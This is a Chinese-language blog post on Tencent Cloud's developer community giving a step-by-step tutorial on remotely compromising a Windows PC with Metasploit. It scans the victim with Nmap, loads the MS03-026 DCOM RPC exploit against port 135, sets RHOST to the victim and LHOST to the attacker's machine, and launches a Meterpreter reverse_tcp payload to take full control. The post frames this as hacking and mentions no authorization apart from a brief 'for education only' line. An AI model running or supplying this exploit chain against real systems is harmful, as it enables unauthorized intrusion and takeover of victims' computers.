前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >如何使用METASPLOIT远程入侵PC?

如何使用METASPLOIT远程入侵PC?

作者头像
Xcnte
发布2021-12-14 09:42:09
1.1K0
发布2021-12-14 09:42:09
举报
文章被收录于专栏:Blog记录Blog记录

Metasploit 是一种先进的黑客工具,拥有一整套先进的渗透测试工具。

渗透测试人员和黑客正在利用这个工具获得如此多的优势。

对于黑客而言,这是一个完整的黑客攻击包,他几乎可以使用它进行任何攻击。

我不是在讨论本文中的攻击,但我将分享如何使用 Metasploit 远程攻击 PC。

如果你注意的话,这并不复杂。它只需要更好地了解您正在执行的每个步骤。让我们继续讨论如何做到这一点。

注意:本教程仅供教育使用

在开始之前,请确保使用 metasploit 远程破解 PC 所需的所有内容。

  • Linux 机器(Kali Linux 或 BackTrack 5)
  • Metasploit(内置于上述 Linux 操作系统中)
  • Windows PC 受害者

步骤

让我们继续讨论如何执行完整的攻击。

  • 启动 Linux 操作系统并打开 Nmap 并为受害远程服务器运行扫描。就像我们在远程服务器 192.168.42.129 上有我们的受害者。它将显示受害者计算机的所有开放端口的范围,如下所示。
  • 我们可以看到这里的开放端口是 135.所以,现在我们去 metasploit 并尝试利用它并获得访问权限。要打开,请导航到 应用程序 > BackTrack > 漏洞利用工具 > 网络漏洞利用工具 > Metasploit 框架 > msfconsole
  • msfconsole 初始化标准检查之后,我们将看到如下窗口。
  • 现在,由于我们已经知道我们的端口 135 是开放的,因此我们在 Metasploit 中搜索相关的 RPC 漏洞。您可以使用命令’ show exploits ‘ 查看 metasploit 支持的所有漏洞利用列表。
  • 现在使用一个漏洞,例如:use exploit/windows/dcerpc/ms03_026_dcom
  • 当我们处于我们所需的漏洞利用环境中时,我们需要根据我们的场景配置漏洞利用。要查看漏洞利用的所有可用选项的列表,我们可以使用命令“ show options ”。我们已经知道开放端口 RPORT 是 135.因此,我们只需要设置我们可以使用“ set RHOST ”命令设置的 RHOST。只需输入“ set RHOST 192.168.42.129 ”即可。
  • 现在,在我们启动漏洞之前,就是为漏洞利用设置有效负载。我们可以使用“ show payloads ”命令查看所有可用的有效负载。
  • 每个有效负载都可用于不同的场景。在我们的例子中,我们使用的是反向 tcp meterpreter,可以使用命令“ set PAYLOAD windows/meterpreter/reverse_tcp ”为远程 shell 设置,然后使用“ show options” 命令查看它的选项。
  • 这里我们注意到 LHOST 没有设置有效载荷,所以我们使用命令“ set LHOST 192.168.42.128 ” 将它设置为我们的公共 IP,即 192.168.42.128
  • 现在,exploit 已配置好并准备启动。现在只需使用“ exploit ”命令来发动攻击。如果 exploit 成功执行,我们将看到如下消息。
  • 现在已经在受害者和我们的机器之间建立了反向连接,我们可以完全控制服务器

我们已经成功访问​​了具有 metasploit 的远程 PC。这就是如何使用 metasploit 远程破解 PC。希望它对你有用。

版权属于:Xcnte' s Blog(除特别注明外)

本文链接:https://cloud.tencent.com/developer/article/1918292

本站文章采用 知识共享署名4.0 国际许可协议 进行许可,请在转载时注明出处及本声明!

本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 步骤
相关产品与服务
网站渗透测试
网站渗透测试(Website Penetration Test,WPT)是完全模拟黑客可能使用的攻击技术和漏洞发现技术,对目标系统的安全做深入的探测,发现系统最脆弱的环节。渗透测试和黑客入侵最大区别在于渗透测试是经过客户授权,采用可控制、非破坏性质的方法和手段发现目标和网络设备中存在弱点,帮助管理者知道自己网络所面临的问题,同时提供安全加固意见帮助客户提升系统的安全性。腾讯云网站渗透测试由腾讯安全实验室安全专家进行,我们提供黑盒、白盒、灰盒多种测试方案,更全面更深入的发现客户的潜在风险。
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档